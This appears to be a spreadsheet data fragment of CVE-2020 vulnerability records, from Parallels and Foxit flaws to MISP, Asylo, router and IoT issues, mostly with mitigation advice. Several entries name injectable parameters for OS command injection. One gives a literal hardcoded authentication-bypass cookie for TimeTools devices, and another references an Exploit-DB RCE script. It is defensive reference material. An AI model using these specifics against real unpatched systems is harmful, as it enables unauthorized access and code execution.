  <si>
    <t>CVE-2020-8874</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.2-47123. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the xHCI component. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the hypervisor. Was ZDI-CAN-10032.</t>
  </si>
  <si>
    <t>CVE-2020-8875</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.2-47123. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the IOCTL handler. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the kernel. Was ZDI-CAN-10028.</t>
  </si>
  <si>
    <t>CVE-2020-8876</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose information on affected installations of Parallels Desktop 15.1.2-47123. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the IOCTL handler. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel. Was ZDI-CAN-10029.</t>
  </si>
  <si>
    <t>CVE-2020-8877</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.916. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of PSD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9624.</t>
  </si>
  <si>
    <t>CVE-2020-8878</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of PSD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9625.</t>
  </si>
  <si>
    <t>CVE-2020-8879</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.916. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of PSD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9626.</t>
  </si>
  <si>
    <t>CVE-2020-8880</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of TIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9773.</t>
  </si>
  <si>
    <t>CVE-2020-8881</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of TIF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9774.</t>
  </si>
  <si>
    <t>CVE-2020-8882</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.916. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the PSD files. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-9811.</t>
  </si>
  <si>
    <t>CVE-2020-8883</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3.6.6.916. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of EPS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9880.</t>
  </si>
  <si>
    <t>CVE-2020-8884</t>
  </si>
  <si>
    <t>rcdsvc in the Proofpoint Insider Threat Management Windows Agent (formerly ObserveIT Windows Agent) before 7.9 allows remote authenticated users to execute arbitrary code as SYSTEM because of improper deserialization over named pipes.</t>
  </si>
  <si>
    <t>CVE-2020-8887</t>
  </si>
  <si>
    <t>Telestream Tektronix Medius before 10.7.5 and Sentry before 10.7.5 have a SQL injection vulnerability allowing an unauthenticated attacker to dump database contents via the page parameter in a page=login request to index.php (aka the server login page).</t>
  </si>
  <si>
    <t>CVE-2020-8890</t>
  </si>
  <si>
    <t>An issue was discovered in MISP before 2.4.121. It mishandled time skew (between the machine hosting the web server and the machine hosting the database) when trying to block a brute-force series of invalid requests.</t>
  </si>
  <si>
    <t>CVE-2020-8891</t>
  </si>
  <si>
    <t>An issue was discovered in MISP before 2.4.121. It did not canonicalize usernames when trying to block a brute-force series of invalid requests.</t>
  </si>
  <si>
    <t>CVE-2020-8892</t>
  </si>
  <si>
    <t>An issue was discovered in MISP before 2.4.121. It did not consider the HTTP PUT method when trying to block a brute-force series of invalid requests.</t>
  </si>
  <si>
    <t>CVE-2020-8893</t>
  </si>
  <si>
    <t>An issue was discovered in MISP before 2.4.121. The Galaxy view contained an incorrectly sanitized search string in app/View/Galaxies/view.ctp.</t>
  </si>
  <si>
    <t>CVE-2020-8894</t>
  </si>
  <si>
    <t>An issue was discovered in MISP before 2.4.121. ACLs for discussion threads were mishandled in app/Controller/ThreadsController.php and app/Model/Thread.php.</t>
  </si>
  <si>
    <t>CVE-2020-8895</t>
  </si>
  <si>
    <t>Untrusted Search Path vulnerability in the windows installer of Google Earth Pro versions prior to 7.3.3 allows an attacker to insert malicious local files to execute unauthenticated remote code on the targeted system.</t>
  </si>
  <si>
    <t>CVE-2020-8896</t>
  </si>
  <si>
    <t>A Buffer Overflow vulnerability in the khcrypt implementation in Google Earth Pro versions up to and including 7.3.2 allows an attacker to perform a Man-in-the-Middle attack using a specially crafted key to read data past the end of the buffer used to hold it. Mitigation: Update to Google Earth Pro 7.3.3.</t>
  </si>
  <si>
    <t>CVE-2020-8897</t>
  </si>
  <si>
    <t>A weak robustness vulnerability exists in the AWS Encryption SDKs for Java, Python, C and Javalcript prior to versions 2.0.0. Due to the non-committing property of AES-GCM (and other AEAD ciphers such as AES-GCM-SIV or (X)ChaCha20Poly1305) used by the SDKs to encrypt messages, an attacker can craft a unique cyphertext which will decrypt to multiple different results, and becomes especially relevant in a multi-recipient setting. We recommend users update their SDK to 2.0.0 or later.</t>
  </si>
  <si>
    <t>CVE-2020-8899</t>
  </si>
  <si>
    <t>There is a buffer overwrite vulnerability in the Quram qmg library of Samsung's Android OS versions O(8.x), P(9.0) and Q(10.0). An unauthenticated, unauthorized attacker sending a specially crafted MMS to a vulnerable phone can trigger a heap-based buffer overflow in the Quram image codec leading to an arbitrary remote code execution (RCE) without any user interaction. The Samsung ID is SVE-2020-16747.</t>
  </si>
  <si>
    <t>CVE-2020-8902</t>
  </si>
  <si>
    <t>Rendertron versions prior to 3.0.0 are are susceptible to a Server-Side Request Forgery (SSRF) attack. An attacker can use a specially crafted webpage to force a rendertron headless chrome process to render internal sites it has access to, and display it as a screenshot. Suggested mitigations are to upgrade your rendertron to version 3.0.0, or, if you cannot update, to secure the infrastructure to limit the headless chrome's access to your internal domain.</t>
  </si>
  <si>
    <t>CVE-2020-8903</t>
  </si>
  <si>
    <t>A vulnerability in Google Cloud Platform's guest-oslogin versions between 20190304 and 20200507 allows a user that is only granted the role "roles/compute.osLogin" to escalate privileges to root. Using their membership to the "adm" group, users with this role are able to read the DHCP XID from the systemd journal. Using the DHCP XID, it is then possible to set the IP address and hostname of the instance to any value, which is then stored in /etc/hosts. An attacker can then point metadata.google.internal to an arbitrary IP address and impersonate the GCE metadata server which make it is possible to instruct the OS Login PAM module to grant administrative privileges. All images created after 2020-May-07 (20200507) are fixed, and if you cannot update, we recommend you edit /etc/group/security.conf and remove the "adm" user from the OS Login entry.</t>
  </si>
  <si>
    <t>CVE-2020-8904</t>
  </si>
  <si>
    <t>An arbitrary memory overwrite vulnerability in the trusted memory of Asylo exists in versions prior to 0.6.0. As the ecall_restore function fails to validate the range of the output_len pointer, an attacker can manipulate the tmp_output_len value and write to an arbitrary location in the trusted (enclave) memory. We recommend updating Asylo to version 0.6.0 or later.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-8905</t>
  </si>
  <si>
    <t>A buffer length validation vulnerability in Asylo versions prior to 0.6.0 allows an attacker to read data they should not have access to. The 'enc_untrusted_recvfrom' function generates a return value which is deserialized by 'MessageReader', and copied into three different 'extents'. The length of the third 'extents' is controlled by the outside world, and not verified on copy, allowing the attacker to force Asylo to copy trusted memory data into an untrusted buffer of significantly small length.. We recommend updating Asylo to version 0.6.0 or later.</t>
  </si>
  <si>
    <t>CVE-2020-8907</t>
  </si>
  <si>
    <t>A vulnerability in Google Cloud Platform's guest-oslogin versions between 20190304 and 20200507 allows a user that is only granted the role "roles/compute.osLogin" to escalate privileges to root. Using their membership to the "docker" group, an attacker with this role is able to run docker and mount the host OS. Within docker, it is possible to modify the host OS filesystem and modify /etc/groups to gain administrative privileges. All images created after 2020-May-07 (20200507) are fixed, and if you cannot update, we recommend you edit /etc/group/security.conf and remove the "docker" user from the OS Login entry.</t>
  </si>
  <si>
    <t>CVE-2020-8908</t>
  </si>
  <si>
    <t>A temp directory creation vulnerability exists in all versions of Guava, allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava API com.google.common.io.Files.createTempDir(). By default, on unix-like systems, the created directory is world-readable (readable by an attacker with access to the system). The method in question has been marked @Deprecated in versions 30.0 and later and should not be used. For Android developers, we recommend choosing a temporary directory API provided by Android, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.</t>
  </si>
  <si>
    <t>CVE-2020-8910</t>
  </si>
  <si>
    <t>A URL parsing issue in goog.uri of the Google Closure Library versions up to and including v20200224 allows an attacker to send malicious URLs to be parsed by the library and return the wrong authority. Mitigation: update your library to version v20200315.</t>
  </si>
  <si>
    <t>CVE-2020-8911</t>
  </si>
  <si>
    <t>A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.</t>
  </si>
  <si>
    <t>CVE-2020-8912</t>
  </si>
  <si>
    <t>A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.</t>
  </si>
  <si>
    <t>CVE-2020-8913</t>
  </si>
  <si>
    <t>A local, arbitrary code execution vulnerability exists in the SplitCompat.install endpoint in Android's Play Core Library versions prior to 1.7.2. A malicious attacker could create an apk which targets a specific application, and if a victim were to install this apk, the attacker could perform a directory traversal, execute code as the targeted application and access the targeted application's data on the Android device. We recommend all users update Play Core to version 1.7.2 or later.</t>
  </si>
  <si>
    <t>CVE-2020-8916</t>
  </si>
  <si>
    <t>A memory leak in Openthread's wpantund versions up to commit 0e5d1601febb869f583e944785e5685c6c747be7, when used in an environment where wpanctl is directly interfacing with the control driver (eg: debug environments) can allow an attacker to crash the service (DoS). We recommend updating, or to restrict access in your debug environments.</t>
  </si>
  <si>
    <t>CVE-2020-8918</t>
  </si>
  <si>
    <t>An improperly initialized 'migrationAuth' value in Google's go-tpm TPM1.2 library versions prior to 0.3.0 can lead an eavesdropping attacker to discover the auth value for a key created with CreateWrapKey. An attacker listening in on the channel can collect both 'encUsageAuth' and 'encMigrationAuth', and then can calculate 'usageAuth ^ encMigrationAuth' as the 'migrationAuth' can be guessed for all keys created with CreateWrapKey. TPM2.0 is not impacted by this. We recommend updating your library to 0.3.0 or later, or, if you cannot update, to call CreateWrapKey with a random 20-byte value for 'migrationAuth'.</t>
  </si>
  <si>
    <t>CVE-2020-8919</t>
  </si>
  <si>
    <t>An information leak vulnerability exists in Gerrit versions prior to 2.15.21, 2.16.25, 3.0.15, 3.1.10, 3.2.5 where a missing access check on the branch REST API allows an attacker with only the default set of priviledges to read all other user's personal account data as well as sub-trees with restricted access.</t>
  </si>
  <si>
    <t>CVE-2020-8920</t>
  </si>
  <si>
    <t>An information leak vulnerability exists in Gerrit versions prior to 2.14.22, 2.15.21, 2.16.25, 3.0.15, 3.1.10, 3.2.5 where an overoptimization with the FilteredRepository wrapper skips the verification of access on All-Users repositories, allowing an attacker to get read access to all users' personal information associated with their accounts.</t>
  </si>
  <si>
    <t>CVE-2020-8923</t>
  </si>
  <si>
    <t>An improper HTML sanitization in Dart versions up to and including 2.7.1 and dev versions 2.8.0-dev.16.0, allows an attacker leveraging DOM Clobbering techniques to skip the sanitization and inject custom html/javascript (XSS). Mitigation: update your Dart SDK to 2.7.2, and 2.8.0-dev.17.0 for the dev version. If you cannot update, we recommend you review the way you use the affected APIs, and pay special attention to cases where user-provided data is used to populate DOM nodes. Consider using Element.innerText or Node.text to populate DOM elements.</t>
  </si>
  <si>
    <t>CVE-2020-8927</t>
  </si>
  <si>
    <t>A buffer overflow exists in the Brotli library versions prior to 1.0.8 where an attacker controlling the input length of a "one-shot" decompression request to a script can trigger a crash, which happens when copying over chunks of data larger than 2 GiB. It is recommended to update your Brotli library to 1.0.8 or later. If one cannot update, we recommend to use the "streaming" API as opposed to the "one-shot" API, and impose chunk size limits.</t>
  </si>
  <si>
    <t>CVE-2020-8929</t>
  </si>
  <si>
    <t>A mis-handling of invalid unicode characters in the Java implementation of Tink versions prior to 1.5 allows an attacker to change the ID part of a ciphertext, which result in the creation of a second ciphertext that can decrypt to the same plaintext. This can be a problem with encrypting deterministic AEAD with a single key, and rely on a unique ciphertext-per-plaintext.</t>
  </si>
  <si>
    <t>CVE-2020-8933</t>
  </si>
  <si>
    <t>A vulnerability in Google Cloud Platform's guest-oslogin versions between 20190304 and 20200507 allows a user that is only granted the role "roles/compute.osLogin" to escalate privileges to root. Using the membership to the "lxd" group, an attacker can attach host devices and filesystems. Within an lxc container, it is possible to attach the host OS filesystem and modify /etc/sudoers to then gain administrative privileges. All images created after 2020-May-07 (20200507) are fixed, and if you cannot update, we recommend you edit /etc/group/security.conf and remove the "lxd" user from the OS Login entry.</t>
  </si>
  <si>
    <t>CVE-2020-8935</t>
  </si>
  <si>
    <t>An arbitrary memory overwrite vulnerability in Asylo versions up to 0.6.0 allow an attacker to make an Ecall_restore function call to reallocate untrusted code and overwrite sections of the Enclave memory address. We recommend updating your library.</t>
  </si>
  <si>
    <t>CVE-2020-8936</t>
  </si>
  <si>
    <t>An arbitrary memory overwrite vulnerability in Asylo versions up to 0.6.0 allows an attacker to make a host call to UntrustedCall. UntrustedCall failed to validate the buffer range within sgx_params and allowed the host to return a pointer that was an address within the enclave memory. This allowed an attacker to read memory values from within the enclave.</t>
  </si>
  <si>
    <t>CVE-2020-8937</t>
  </si>
  <si>
    <t>An arbitrary memory overwrite vulnerability in Asylo versions up to 0.6.0 allows an attacker to make a host call to enc_untrusted_create_wait_queue that uses a pointer queue that relies on UntrustedLocalMemcpy, which fails to validate where the pointer is located. This allows an attacker to write memory values from within the enclave. We recommend upgrading past commit a37fb6a0e7daf30134dbbf357c9a518a1026aa02</t>
  </si>
  <si>
    <t>CVE-2020-8938</t>
  </si>
  <si>
    <t>An arbitrary memory overwrite vulnerability in Asylo versions up to 0.6.0 allows an attacker to make a host call to FromkLinuxSockAddr with attacker controlled content and size of klinux_addr which allows an attacker to write memory values from within the enclave. We recommend upgrading past commit a37fb6a0e7daf30134dbbf357c9a518a1026aa02</t>
  </si>
  <si>
    <t>CVE-2020-8939</t>
  </si>
  <si>
    <t>An out of bounds read on the enc_untrusted_inet_ntop function allows an attack to extend the result size that is used by memcpy() to read memory from within the enclave heap. We recommend upgrading past commit 6ff3b77ffe110a33a2f93848a6333f33616f02c4</t>
  </si>
  <si>
    <t>CVE-2020-8940</t>
  </si>
  <si>
    <t>An arbitrary memory read vulnerability in Asylo versions up to 0.6.0 allows an untrusted attacker to make a call to enc_untrusted_recvmsg using an attacker controlled result parameter. The parameter size is unchecked allowing the attacker to read memory locations outside of the intended buffer size including memory addresses within the secure enclave. We recommend upgrading or past commit fa6485c5d16a7355eab047d4a44345a73bc9131e</t>
  </si>
  <si>
    <t>CVE-2020-8941</t>
  </si>
  <si>
    <t>An arbitrary memory read vulnerability in Asylo versions up to 0.6.0 allows an untrusted attacker to make a call to enc_untrusted_inet_pton using an attacker controlled klinux_addr_buffer parameter. The parameter size is unchecked allowing the attacker to read memory locations outside of the intended buffer size including memory addresses within the secure enclave. We recommend upgrading past commit 8fed5e334131abaf9c5e17307642fbf6ce4a57ec</t>
  </si>
  <si>
    <t>CVE-2020-8942</t>
  </si>
  <si>
    <t>An arbitrary memory read vulnerability in Asylo versions up to 0.6.0 allows an untrusted attacker to make a call to enc_untrusted_read whose return size was not validated against the requrested size. The parameter size is unchecked allowing the attacker to read memory locations outside of the intended buffer size including memory addresses within the secure enclave. We recommend upgrading past commit b1d120a2c7d7446d2cc58d517e20a1b184b82200</t>
  </si>
  <si>
    <t>CVE-2020-8943</t>
  </si>
  <si>
    <t>An arbitrary memory read vulnerability in Asylo versions up to 0.6.0 allows an untrusted attacker to make a call to enc_untrusted_recvfrom whose return size was not validated against the requested size. The parameter size is unchecked allowing the attacker to read memory locations outside of the intended buffer size including memory addresses within the secure enclave. We recommend upgrading past commit 6e158d558abd3c29a0208e30c97c9a8c5bd4230f</t>
  </si>
  <si>
    <t>CVE-2020-8944</t>
  </si>
  <si>
    <t>An arbitrary memory write vulnerability in Asylo versions up to 0.6.0 allows an untrusted attacker to make a call to ecall_restore using the attribute output which fails to check the range of a pointer. An attacker can use this pointer to write to arbitrary memory addresses including those within the secure enclave We recommend upgrading past commit 382da2b8b09cbf928668a2445efb778f76bd9c8a</t>
  </si>
  <si>
    <t>CVE-2020-8945</t>
  </si>
  <si>
    <t>The proglottis Go wrapper before 0.1.1 for the GPGME library has a use-after-free, as demonstrated by use for container image pulls by Docker or CRI-O. This leads to a crash or potential code execution during GPG signature verification.</t>
  </si>
  <si>
    <t>CVE-2020-8946</t>
  </si>
  <si>
    <t>Netis WF2471 v1.2.30142 devices allow an authenticated attacker to execute arbitrary OS commands via shell metacharacters in the /cgi-bin-igd/sys_log_clean.cgi log_3g_type parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8947</t>
  </si>
  <si>
    <t>functions_netflow.php in Artica Pandora FMS 7.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the index.php?operation/netflow/nf_live_view ip_dst, dst_port, or src_port parameter, a different vulnerability than CVE-2019-20224.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48064.py</t>
  </si>
  <si>
    <t>PANDORAFMS 7.0 - Authenticated Remote Code Execution</t>
  </si>
  <si>
    <t>2020-02-13</t>
  </si>
  <si>
    <t>CVE-2020-8948</t>
  </si>
  <si>
    <t>The Sierra Wireless Windows Mobile Broadband Driver Packages (MBDP) before build 5043 allows an unprivileged user to overwrite arbitrary files in arbitrary folders using hard links. An unprivileged user could leverage this vulnerability to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-8949</t>
  </si>
  <si>
    <t>Gocloud S2A_WL 4.2.7.16471, S2A 4.2.7.17278, S2A 4.3.0.15815, S2A 4.3.0.17193, S3A K2P MTK 4.2.7.16528, S3A 4.3.0.16572, and ISP3000 4.3.0.17190 devices allows remote attackers to execute arbitrary OS commands via shell metacharacters in a ping operation, as demonstrated by the cgi-bin/webui/admin/tools/app_ping/diag_ping/; substring.</t>
  </si>
  <si>
    <t>CVE-2020-8950</t>
  </si>
  <si>
    <t>The AUEPLauncher service in Radeon AMD User Experience Program Launcher through 1.0.0.1 on Windows allows elevation of privilege by placing a crafted file in %PROGRAMDATA%\AMD\PPC\upload and then creating a symbolic link in %PROGRAMDATA%\AMD\PPC\temp that points to an arbitrary folder with an arbitrary file name.</t>
  </si>
  <si>
    <t>CVE-2020-8951</t>
  </si>
  <si>
    <t>Fiserv Accurate Reconciliation 2.19.0, fixed in 3.0.0 or higher, allows XSS via the Source or Destination field of the Configuration Manager (Configuration Parameter Translation) page.</t>
  </si>
  <si>
    <t>CVE-2020-8952</t>
  </si>
  <si>
    <t>Fiserv Accurate Reconciliation 2.19.0, fixed in 3.0.0 or higher, allows XSS via the logout.jsp timeOut parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8953</t>
  </si>
  <si>
    <t>OpenVPN Access Server 2.8.x before 2.8.1 allows LDAP authentication bypass (except when a user is enrolled in two-factor authentication).</t>
  </si>
  <si>
    <t>CVE-2020-8954</t>
  </si>
  <si>
    <t>OpenSearch Web browser 1.0.4.9 allows Intent Scheme Hijacking.[a link that opens another app in the browser can be manipulated]</t>
  </si>
  <si>
    <t>CVE-2020-8955</t>
  </si>
  <si>
    <t>irc_mode_channel_update in plugins/irc/irc-mode.c in WeeChat through 2.7 allows remote attackers to cause a denial of service (buffer overflow and application crash) or possibly have unspecified other impact via a malformed IRC message 324 (channel mode).</t>
  </si>
  <si>
    <t>CVE-2020-8956</t>
  </si>
  <si>
    <t>Pulse Secure Desktop Client 9.0Rx before 9.0R5 and 9.1Rx before 9.1R4 on Windows reveals users' passwords if Save Settings is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-8958</t>
  </si>
  <si>
    <t>Guangzhou 1GE ONU V2801RW 1.9.1-181203 through 2.9.0-181024 and V2804RGW 1.9.1-181203 through 2.9.0-181024 devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the boaform/admin/formPing Dest IP Address field.</t>
  </si>
  <si>
    <t>CVE-2020-8959</t>
  </si>
  <si>
    <t>Western Digital WesternDigitalSSDDashboardSetup.exe before 3.0.2.0 allows DLL Hijacking.</t>
  </si>
  <si>
    <t>CVE-2020-8960</t>
  </si>
  <si>
    <t>Western Digital mycloud.com before Web Version 2.2.0-134 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-8961</t>
  </si>
  <si>
    <t>An issue was discovered in Avira Free-Antivirus before 15.0.2004.1825. The Self-Protection feature does not prohibit a write operation from an external process. Thus, code injection can be used to turn off this feature. After that, one can construct an event that will modify a file at a specific location, and pass this event to the driver, thereby defeating the anti-virus functionality.</t>
  </si>
  <si>
    <t>CVE-2020-8962</t>
  </si>
  <si>
    <t>A stack-based buffer overflow was found on the D-Link DIR-842 REVC with firmware v3.13B09 HOTFIX due to the use of strcpy for LOGINPASSWORD when handling a POST request to the /MTFWU endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-8963</t>
  </si>
  <si>
    <t>TimeTools SC7105 1.0.007, SC9205 1.0.007, SC9705 1.0.007, SR7110 1.0.007, SR9210 1.0.007, SR9750 1.0.007, SR9850 1.0.007, T100 1.0.003, T300 1.0.003, and T550 1.0.003 devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the t3.cgi srmodel or srtime parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8964</t>
  </si>
  <si>
    <t>TimeTools SC7105 1.0.007, SC9205 1.0.007, SC9705 1.0.007, SR7110 1.0.007, SR9210 1.0.007, SR9750 1.0.007, SR9850 1.0.007, T100 1.0.003, T300 1.0.003, and T550 1.0.003 devices allow remote attackers to bypass authentication by placing t3axs=TiMEtOOlsj7G3xMm52wB in a t3.cgi request, aka a "hardcoded cookie."</t>
  </si>
  <si>
    <t>CVE-2020-8966</t>
  </si>
  <si>
    <t>There is an Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in php webpages of Tiki-Wiki Groupware. Tiki-Wiki CMS all versions through 20.0 allows malicious users to cause the injection of malicious code fragments (scripts) into a legitimate web page.</t>
  </si>
  <si>
    <t>CVE-2020-8967</t>
  </si>
  <si>
    <t>There is an improper Neutralization of Special Elements used in an SQL Command (SQL Injection) vulnerability in php files of GESIO ERP. GESIO ERP all versions prior to 11.2 allows malicious users to retrieve all database information.</t>
  </si>
  <si>
    <t>CVE-2020-8968</t>
  </si>
  <si>
    <t>Parallels Remote Application Server (RAS) allows a local attacker to retrieve certain profile password in clear text format by uploading a previously stored cyphered file by Parallels RAS. The confidentiality, availability and integrity of the information of the user could be compromised if an attacker is able to recover the profile password.</t>
  </si>
  <si>
    <t>CVE-2020-8973</t>
  </si>
  <si>
    <t>ZGR TPS200 NG in its 2.00 firmware version and 1.01 hardware version, does not properly accept specially constructed requests. This allows an attacker with access to the network where the affected asset is located, to operate and change several parameters without having to be registered as a user on the web that owns the device.</t>
  </si>
  <si>
    <t>CVE-2020-8974</t>
  </si>
  <si>
    <t>In ZGR TPS200 NG 2.00 firmware version and 1.01 hardware version, the firmware upload process does not perform any type of restriction. This allows an attacker to modify it and re-upload it via web with malicious modifications, rendering the device unusable.</t>
  </si>
  <si>
    <t>CVE-2020-8975</t>
  </si>
  <si>
    <t>ZGR TPS200 NG in its 2.00 firmware version and 1.01 hardware version, allows a remote attacker with access to the web application and knowledge of the routes (URIs) used by the application, to access sensitive information about the system.</t>
  </si>
  <si>
    <t>CVE-2020-8976</t>
  </si>
  <si>
    <t>The integrated server of the ZGR TPS200 NG on its 2.00 firmware version and 1.01 hardware version, allows a remote attacker to perform actions with the permissions of a victim user. For this to happen, the victim user has to have an active session and triggers the malicious request.</t>
  </si>
  <si>
    <t>CVE-2020-8981</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability was discovered in the Source Integration plugin before 1.6.2 and 2.x before 2.3.1 for MantisBT. The repo_delete.php Delete Repository page allows execution of arbitrary code via a repo name (if CSP settings permit it). This is related to CVE-2018-16362.</t>
  </si>
  <si>
    <t>CVE-2020-8982</t>
  </si>
  <si>
    <t>An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020. RCE and file access is granted to everything hosted by ShareFile, be it on-premise or inside Citrix Cloud itself (both are internet facing). NOTE: unlike most CVEs, exploitability depends on the product version that was in use when a particular setup step was performed, NOT the product version that is in use during a current assessment of a CVE consumer's product inventory. Specifically, the vulnerability can be exploited if a storage zone was created by one of these product versions: 5.9.0, 5.8.0, 5.7.0, 5.6.0, 5.5.0, or earlier. This CVE differs from CVE-2020-7473 and CVE-2020-8983.</t>
  </si>
  <si>
    <t>CVE-2020-8983</t>
  </si>
  <si>
    <t>An arbitrary file write issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020, which allows remote code execution. RCE and file access is granted to everything hosted by ShareFile, be it on-premise or inside Citrix Cloud itself (both are internet facing). NOTE: unlike most CVEs, exploitability depends on the product version that was in use when a particular setup step was performed, NOT the product version that is in use during a current assessment of a CVE consumer's product inventory. Specifically, the vulnerability can be exploited if a storage zone was created by one of these product versions: 5.9.0, 5.8.0, 5.7.0, 5.6.0, 5.5.0, or earlier. This CVE differs from CVE-2020-7473 and CVE-2020-8982.</t>
  </si>
  <si>
    <t>CVE-2020-8984</t>
  </si>
  <si>
    <t>lib/NSSDropbox.php in ZendTo prior to 5.22-2 Beta allowed IP address spoofing via the X-Forwarded-For header.</t>
  </si>
  <si>
    <t>CVE-2020-8985</t>
  </si>
  <si>
    <t>ZendTo prior to 5.22-2 Beta allowed reflected XSS and CSRF via the unlock.tpl unlock user functionality.</t>
  </si>
  <si>
    <t>CVE-2020-8986</t>
  </si>
  <si>
    <t>lib/NSSDropbox.php in ZendTo prior to 5.22-2 Beta failed to properly check for equality when validating the session cookie, allowing an attacker to gain administrative access with a large number of requests.</t>
  </si>
  <si>
    <t>CVE-2020-8987</t>
  </si>
  <si>
    <t>Avast AntiTrack before 1.5.1.172 and AVG Antitrack before 2.0.0.178 proxies traffic to HTTPS sites but does not validate certificates, and thus a man-in-the-middle can host a malicious website using a self-signed certificate. No special action necessary by the victim using AntiTrack with "Allow filtering of HTTPS traffic for tracking detection" enabled. (This is the default configuration.)</t>
  </si>
  <si>
    <t>CVE-2020-8988</t>
  </si>
  <si>
    <t>The Voatz application 2020-01-01 for Android allows only 100 million different PINs, which makes it easier for attackers (after using root access to make a copy of the local database) to discover login credentials and voting history via an offline brute-force approach.</t>
  </si>
  <si>
    <t>CVE-2020-8989</t>
  </si>
  <si>
    <t>In the Voatz application 2020-01-01 for Android, the amount of data transmitted during a single voter's vote depends on the different lengths of the metadata across the available voting choices, which makes it easier for remote attackers to discover this voter's choice by sniffing the network. For example, a small amount of sniffed data may indicate that a vote was cast for the candidate with the least metadata. An active man-in-the-middle attacker can leverage this behavior to disrupt voters' abilities to vote for a candidate opposed by the attacker.</t>
  </si>
  <si>
    <t>CVE-2020-8990</t>
  </si>
  <si>
    <t>Western Digital My Cloud Home before 3.6.0 and ibi before 3.6.0 allow Session Fixation.</t>
  </si>
  <si>
    <t>CVE-2020-8991</t>
  </si>
  <si>
